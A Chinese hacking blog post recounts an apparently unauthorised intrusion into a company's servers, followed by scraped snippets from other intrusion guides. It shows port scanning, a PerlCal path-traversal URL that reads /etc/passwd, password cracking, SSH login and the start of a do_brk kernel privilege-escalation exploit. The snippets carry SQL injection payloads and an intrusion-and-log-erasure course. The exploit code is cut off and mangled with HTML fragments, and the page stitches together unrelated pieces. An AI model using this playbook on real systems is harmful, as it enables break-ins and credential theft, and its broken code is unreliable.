黑客技术
Kindle's blog
正文
废话不说。开工
C:\Documents and Settings\Administrator>ping doc.docsou.com
Pinging doc.docsou.com [192.168.0.252] with 32 bytes of data:
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Reply from 192.168.0.252: bytes=32 time<10ms TTL=128
Ping statistics for 192.168.0.252:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
文章中IP为假的 在这里不公布真正IP
看TTL的返回信息判断系统应该不是真的 现在可以改这个
先扫描他看看吧
结果只开了 21 22 80
看来成功率不算打 FTP并没有若口令 80也没什么信息
看来了他站里 发现分有bbs.xxx.com 和 news.xxx.com 而且IP都不一样 看来想办法渗透了。
首先去bbs.xxx.com看看 用的程序似乎是绿盟那样子的 呵呵 似乎没什么漏洞 先放边上。
看看服务器开的端口情况
开了 21 22 80 也没什么漏洞
在看看news.xxx.com
经过扫描 判断服务器应该是 NT/2000
21 80 389 1002 3389
基本上也没什么漏洞 21 没若口令 这个是IIS的 检查了一便也没什么漏洞 389 也没什么用 3389 不可能有输入法吧登陆看看系统
2000server的
news.xxx.com用的程序是asp的 想到了SQL注入。不过彻底查看了一下 所有的都过滤了。
有点郁闷了
jswz.xxx.com
也是一个分页 不过这个另我非常的意外 用的是cgi的 系统是linux
21 22 80
扫了一下有个漏洞
cal_make.pl 看名字有点熟悉 看了一下 不过一直没想起来
去了国外的几个站 终于发现了~~~
Name : PerlCal
About : cal_make.pl of the PerlCal script may allow remote users(website visitors) to view any file on a webserver
(dependingon the user the webserver is running on).
Exploit:
_make.pl?\" target=_blank>doc.docsou.com?\
p0=../../../../../../../../../../../../etc/passwd%00
by: stan (stan@whizkunde.org)
呵呵 感谢hack.co.za
在浏览器地址栏输入
_make.pl?p0=../../../../../../../../../../../../../etc/passwd%00" target=_blank>doc.docsou.com
好多用户信息 不过这是一个shadow过了passwd 好不容易的机会 不能放弃!
想办法 跑这些用户吧~~~
提炼用户名 希望有弱口令
提炼过程大家参考一些资料去吧
一共20多个用户 跑出来了2个 哈哈。。~~
用SSH登陆~
权限似乎非常低
用第二个试试
哎 还是一样
看看提升权限吧~~
经过一番折腾 100%确定是rh73 内核Linux kernel 2.4
用do_brk的益出~
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char hellc0de[] =
"\x69\x6e\x74\x20\x67\x
记一次简单的渗透测试经过 笔者的一位朋友应聘到一家公司做网管,据说整个机房就他们俩人,工作很轻松。几乎是没什么事做,但是昨天突然给我打电话说是机房被入侵了,...
教程+工具渗透入侵+提权+嗅探+擦除入侵记录全套教程 需要的工具都带上了,是黑手网做的,视频有100+mb,压缩后20+mb 教得很详细。下载地址:http://pan.baidu....
记一次对学校DHCP服务器的入侵渗透过程来源:转载 作者:佚名 时间:2007-07-05 10:07:31 分享到: QQ空间新浪微博腾讯微博人人网前言: 我所处的网络是一个学校...
渗透笔记之脚本入侵_计算机软件及应用_IT/计算机_专业资料。渗透笔记之脚本入侵(...(PS:一次性爆表:.+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_...
渗透入侵笔记 Ewebedit入侵大集合_IT/计算机_专业资料...第一次发现这漏洞源于去年的 一次入侵,在山穷水尽...然后记下src=’***’中的“***”,这就是eWeb...
渗透笔记之脚本入侵(ASP、PHP_计算机软件及应用_IT/计算机_专业资料。简单判定有...(PS:一次性爆表:.+union+select+1,2,3,4,GROUP_CONCAT(DISTINCT+table_...
网站入侵笔记,黑客渗透笔记,拿站思路_IT/计算机_专业资料。网站入侵笔记,黑客渗透笔记,拿站思路已知程序-- 分析代码---漏洞利用---提权 如:找到默认数据库下载-...
渗透入侵笔记 GOOLGE 黑客技术_IT/计算机_专业资料。渗透入侵笔记 GOOLGE 黑客技术 在搜索框上输入:“indexof/”inurl:lib 再按搜索你将进入许多图书馆,并且一定能...
渗透入侵笔记 ASP一日通_IT/计算机_专业资料。渗透入侵笔记 ASP一日通 ASP一日通 <% 语句 …… %> <2>定义变量dim语句 <% dim a,b a=10 b=”ok!”...
渗透入侵笔记 tools里的修复1433的文章 下面来说sa下执行命令错误的几种情况: 1、无法装载DLL xpsql70.dll或该DLL所引用的某一DLL。原因126(找不到指定模块。)...
渗透攻击笔记_互联网_IT/计算机_专业资料。* ( 工具 )各种目标服务器的各种版本...入侵渗透的思路 20页 免费 企业级Web安全渗透测试之... 14页 免费...
闽公网安备 35021102001881号 
热门文档